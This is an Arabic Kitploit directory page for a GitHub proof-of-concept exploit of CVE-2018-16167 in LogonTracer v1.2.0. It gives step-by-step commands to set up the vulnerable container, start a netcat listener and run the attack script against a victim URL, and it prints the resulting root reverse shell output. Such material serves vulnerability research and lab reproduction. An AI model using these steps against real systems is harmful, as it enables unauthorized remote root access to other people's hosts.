Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-16167 — استغلال إثبات المفهوم لثغرة تنفيذ التعليمات البرمجية عن بُعد في LogonTracer v1.2.0، مما يوفر قشرة عكسية عبر Python و netcat. | Kitploit
أدوات/GitHubGitHub/dnr6419/cve-2018-16167
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubdnr6419/cve-2018-16167

CVE-2018-16167

استغلال إثبات المفهوم لثغرة تنفيذ التعليمات البرمجية عن بُعد في LogonTracer v1.2.0، مما يوفر قشرة عكسية عبر Python و netcat.

عرض المستودع
30منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ترتيب التثبيت والتشغيل

0. تثبيت LogonTracer

قم بتنزيل الإصدار 1.2.0 من LogonTracer الذي تم اكتشاف الثغرة فيه من Docker Hub.

 $docker pull jpcertcc/docker-logontracer:v1.2.0 

1. تشغيل LogonTracer

قم بتشغيله في حاوية باستخدام الأمر التالي:

 $docker run \
   --detach \
   --publish=7474:7474 --publish=7687:7687 --publish=8080:8080 \
   -e LTHOSTNAME=[IP_ADDR] \
   jpcertcc/docker-logontracer:v1.2.0

2. فتح منفذ على المضيف للحصول على shell باستخدام nc

افتح منفذًا معينًا على المضيف الذي ستحصل منه على shell باستخدام nc.

 
PS C:\Users\0ppr2s\Desktop\main\nc> .\nc64.exe -lvp {attacker_port}
listening on [any] 8888 ...

3. تنفيذ كود الهجوم

نفذ كود الهجوم:

 
dnr6419@DESKTOP-4CJA7LD ~/docker/logon
☺  python3 go.py {attacker_ip} {attacker_port} http://{victime_ip}:8080

نتيجة التنفيذ

كما هو موضح في الصورة أدناه، تم تنفيذ كود الهجوم بنجاح وتم الحصول على shell عن بُعد.

PS C:\Users\0ppr2s\Desktop\main\nc> .\nc64.exe -lvp 8888
listening on [any] 8888 ...
192.168.56.103: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.103] 41858: NO_DATA
/usr/local/src/LogonTracer # ^[[16;30Rid
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/usr/local/src/LogonTracer # ^[[20;30R

image

تنزيل الأداة